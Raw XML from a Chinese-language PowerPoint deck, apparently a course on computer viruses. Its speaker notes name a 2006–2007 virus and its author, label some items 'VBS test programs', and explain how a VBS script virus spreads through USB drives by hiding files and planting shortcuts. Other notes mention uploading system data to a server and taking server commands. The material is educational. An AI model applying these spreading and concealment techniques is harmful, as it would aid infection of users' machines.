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heme/themeOverride1.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride2.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride3.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride4.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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96" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId152"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="474" r:id="rId6"/>
    <p:sldId id="475" r:id="rId7"/>
    <p:sldId id="292" r:id="rId8"/>
    <p:sldId id="477" r:id="rId9"/>
    <p:sldId id="476" r:id="rId10"/>
    <p:sldId id="478" r:id="rId11"/>
    <p:sldId id="259" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="484" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="479" r:id="rId16"/>
    <p:sldId id="293" r:id="rId17"/>
    <p:sldId id="480" r:id="rId18"/>
    <p:sldId id="356" r:id="rId19"/>
    <p:sldId id="312" r:id="rId20"/>
    <p:sldId id="310" r:id="rId21"/>
    <p:sldId id="311" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="309" r:id="rId24"/>
    <p:sldId id="346" r:id="rId25"/>
    <p:sldId id="347" r:id="rId26"/>
    <p:sldId id="416" r:id="rId27"/>
    <p:sldId id="417" r:id="rId28"/>
    <p:sldId id="410" r:id="rId29"/>
    <p:sldId id="418" r:id="rId30"/>
    <p:sldId id="419" r:id="rId31"/>
    <p:sldId id="357" r:id="rId32"/>
    <p:sldId id="420" r:id="rId33"/>
    <p:sldId id="464" r:id="rId34"/>
    <p:sldId id="358" r:id="rId35"/>
    <p:sldId id="414" r:id="rId36"/>
    <p:sldId id="415" r:id="rId37"/>
    <p:sldId id="411" r:id="rId38"/>
    <p:sldId id="412" r:id="rId39"/>
    <p:sldId id="413" r:id="rId40"/>
    <p:sldId id="348" r:id="rId41"/>
    <p:sldId id="349" r:id="rId42"/>
    <p:sldId id="350" r:id="rId43"/>
    <p:sldId id="351" r:id="rId44"/>
    <p:sldId id="421" r:id="rId45"/>
    <p:sldId id="422" r:id="rId46"/>
    <p:sldId id="423" r:id="rId47"/>
    <p:sldId id="424" r:id="rId48"/>
    <p:sldId id="425" r:id="rId49"/>
    <p:sldId id="426" r:id="rId50"/>
    <p:sldId id="427" r:id="rId51"/>
    <p:sldId id="352" r:id="rId52"/>
    <p:sldId id="428" r:id="rId53"/>
    <p:sldId id="429" r:id="rId54"/>
    <p:sldId id="353" r:id="rId55"/>
    <p:sldId id="354" r:id="rId56"/>
    <p:sldId id="466" r:id="rId57"/>
    <p:sldId id="467" r:id="rId58"/>
    <p:sldId id="468" r:id="rId59"/>
    <p:sldId id="469" r:id="rId60"/>
    <p:sldId id="294" r:id="rId61"/>
    <p:sldId id="482" r:id="rId62"/>
    <p:sldId id="483" r:id="rId63"/>
    <p:sldId id="315" r:id="rId64"/>
    <p:sldId id="362" r:id="rId65"/>
    <p:sldId id="370" r:id="rId66"/>
    <p:sldId id="487" r:id="rId67"/>
    <p:sldId id="488" r:id="rId68"/>
    <p:sldId id="364" r:id="rId69"/>
    <p:sldId id="367" r:id="rId70"/>
    <p:sldId id="316" r:id="rId71"/>
    <p:sldId id="317" r:id="rId72"/>
    <p:sldId id="295" r:id="rId73"/>
    <p:sldId id="489" r:id="rId74"/>
    <p:sldId id="345" r:id="rId75"/>
    <p:sldId id="344" r:id="rId76"/>
    <p:sldId id="319" r:id="rId77"/>
    <p:sldId id="296" r:id="rId78"/>
    <p:sldId id="485" r:id="rId79"/>
    <p:sldId id="486" r:id="rId80"/>
    <p:sldId id="297" r:id="rId81"/>
    <p:sldId id="320" r:id="rId82"/>
    <p:sldId id="321" r:id="rId83"/>
    <p:sldId id="298" r:id="rId84"/>
    <p:sldId id="327" r:id="rId85"/>
    <p:sldId id="328" r:id="rId86"/>
    <p:sldId id="299" r:id="rId87"/>
    <p:sldId id="304" r:id="rId88"/>
    <p:sldId id="300" r:id="rId89"/>
    <p:sldId id="301" r:id="rId90"/>
    <p:sldId id="470" r:id="rId91"/>
    <p:sldId id="471" r:id="rId92"/>
    <p:sldId id="472" r:id="rId93"/>
    <p:sldId id="473" r:id="rId94"/>
    <p:sldId id="323" r:id="rId95"/>
    <p:sldId id="302" r:id="rId96"/>
    <p:sldId id="303" r:id="rId97"/>
    <p:sldId id="326" r:id="rId98"/>
    <p:sldId id="287" r:id="rId99"/>
    <p:sldId id="288" r:id="rId100"/>
    <p:sldId id="330" r:id="rId101"/>
    <p:sldId id="336" r:id="rId102"/>
    <p:sldId id="360" r:id="rId103"/>
    <p:sldId id="430" r:id="rId104"/>
    <p:sldId id="338" r:id="rId105"/>
    <p:sldId id="339" r:id="rId106"/>
    <p:sldId id="340" r:id="rId107"/>
    <p:sldId id="341" r:id="rId108"/>
    <p:sldId id="342" r:id="rId109"/>
    <p:sldId id="372" r:id="rId110"/>
    <p:sldId id="481" r:id="rId111"/>
    <p:sldId id="373" r:id="rId112"/>
    <p:sldId id="374" r:id="rId113"/>
    <p:sldId id="375" r:id="rId114"/>
    <p:sldId id="376" r:id="rId115"/>
    <p:sldId id="377" r:id="rId116"/>
    <p:sldId id="431" r:id="rId117"/>
    <p:sldId id="458" r:id="rId118"/>
    <p:sldId id="379" r:id="rId119"/>
    <p:sldId id="378" r:id="rId120"/>
    <p:sldId id="380" r:id="rId121"/>
    <p:sldId id="381" r:id="rId122"/>
    <p:sldId id="382" r:id="rId123"/>
    <p:sldId id="383" r:id="rId124"/>
    <p:sldId id="384" r:id="rId125"/>
    <p:sldId id="385" r:id="rId126"/>
    <p:sldId id="465" r:id="rId127"/>
    <p:sldId id="386" r:id="rId128"/>
    <p:sldId id="387" r:id="rId129"/>
    <p:sldId id="388" r:id="rId130"/>
    <p:sldId id="433" r:id="rId131"/>
    <p:sldId id="434" r:id="rId132"/>
    <p:sldId id="455" r:id="rId133"/>
    <p:sldId id="456" r:id="rId134"/>
    <p:sldId id="395" r:id="rId135"/>
    <p:sldId id="396" r:id="rId136"/>
    <p:sldId id="397" r:id="rId137"/>
    <p:sldId id="442" r:id="rId138"/>
    <p:sldId id="443" r:id="rId139"/>
    <p:sldId id="444" r:id="rId140"/>
    <p:sldId id="445" r:id="rId141"/>
    <p:sldId id="404" r:id="rId142"/>
    <p:sldId id="457" r:id="rId143"/>
    <p:sldId id="405" r:id="rId144"/>
    <p:sldId id="407" r:id="rId145"/>
    <p:sldId id="408" r:id="rId146"/>
    <p:sldId id="459" r:id="rId147"/>
    <p:sldId id="463" r:id="rId148"/>
    <p:sldId id="460" r:id="rId149"/>
    <p:sldId id="461" r:id="rId150"/>
    <p:sldId id="462" r:id="rId151"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7099300" cy="10234613"/>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9568" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="104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8FCC214D-2953-40D7-AE70-5DBB36FF4BF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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defTabSz="965200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E9BFDB-DDC6-4A98-AD71-10C8D0F2C5D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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lvl1pPr algn="r" defTabSz="965200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE90D695-E2E6-4830-9AEA-7A23A41986AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A58802-D4CE-4AA6-8E01-8FF1E25D0329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="709613" y="4860925"/>
            <a:ext cx="5680075" cy="4606925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96460" tIns="48230" rIns="96460" bIns="4823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5846" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFBC9642-AC21-49CB-96C8-6C491124D659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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defTabSz="965200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35847" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BFC51EE-C4BC-4C85-BA90-40FD4EFCDFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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460" tIns="48230" rIns="96460" bIns="48230" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="965200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2C0F0814-F375-4B63-8F5A-B9087699A934}"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13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137.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138.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139.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E965AED0-9EEE-4644-A338-67DCB89A2841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDE3D74-26F6-4B60-B843-1182536648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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC44B15-96BC-493A-98D4-09F21BB0789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52BF228-D052-46F3-B5C9-F773EAEE0138}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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02F41440-4014-464B-A3BC-20F0C82AAF1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94DC5BA8-2A0A-4A1D-8F61-74F057C7E4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2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日编写，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年初爆发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>李俊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2014, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络赌博，二次进监狱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F0C094A-1A46-4030-900A-C3C9D6DF572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F15963B-03AA-4656-BF27-8196AECE3174}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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CEEEDEF0-D205-49B9-968E-5E32DE62C7D1}"/>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0FA2F41A-DF28-4909-8385-EDDEEE25898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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30B023A-B275-476E-AAB6-755C0134C59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82CDECE-9FDE-4627-BCB7-EEBF9C8A5D6B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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A05CBE91-DAD8-4BEB-AD98-8BE00FFDE2F3}"/>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533210F1-4B91-4805-8C9D-C65087CDDBD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400" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>测试小程序</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44C7195-EE8F-4084-B61D-BEFE8B19518E}"/>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92C0A07A-2BC6-4306-8118-F5545EC938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400" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>测试小程序</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982FCB27-204D-4B44-9671-6B9A7F2BD419}"/>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8F698A6A-BB4A-445B-AC7E-9C9202E539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zh-CN" altLang="en-US" sz="1400" b="1">
              <a:cs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9F07E09-0985-4382-B6B0-455C34AB90B8}"/>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E8A67C4F-E22F-44F3-9E10-5E0D7BF205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zh-CN" altLang="en-US" sz="1400" b="1">
              <a:cs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B7AD9BA1-0CB0-4EDD-923E-9A6C0F53CC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8043F7F3-53C1-4B45-BBCB-44BACB1D55B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If not linkfile then exit for : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是注释</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描所有的驱动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果类型号是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会有所动作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时代表可移动设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这是想感染优盘之类的可移动设备。它将脚本拷贝到可移动设备的根目录下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后设置文件属性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为隐藏文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可读写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为系统文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可读写。 然后获取可移动设备根目录所有的的文文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>lnk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将其设置为隐藏的系统文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可读写。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>击该快捷方式后会先启动那个脚本病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后再启动真正的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之后退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。 然后对根目录下件夹作同样的操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76B70D54-B269-480A-8E8D-8C156AE43F8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B06C9DAD-3472-495F-949D-7B4A1A44ECAC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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80CE9F9A-C1A6-45FA-B285-2A43F139B5EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{862C5970-CBD4-41B6-A478-751BB11E451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上传系统信息至服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13361C8C-0C13-460F-8F5F-64AD3281B8D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79559181-E436-421F-8D1E-F3FE3D68C6EC}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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45DFC261-87D4-48DB-9EDD-EC74B42B55F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E823AA2-3881-4F9B-B6F1-8C66669B4CF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接收服务器指令，根据不同指令进行操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>批处理模式，将不显示警报、 脚本编写错误或输入的提示。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293394A7-5C1A-4438-9E6E-9F8B30A77B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9E02D72-5E9A-46BE-8C0A-9E4EE7BA311A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B577F5D9-1A29-45EC-8C44-12597155939C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CEA54F3-7709-4847-85E3-C3D9C1E00D8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DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头是用来兼容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MS-DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows PE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件的主要信息，其中包括一个‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>PE’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
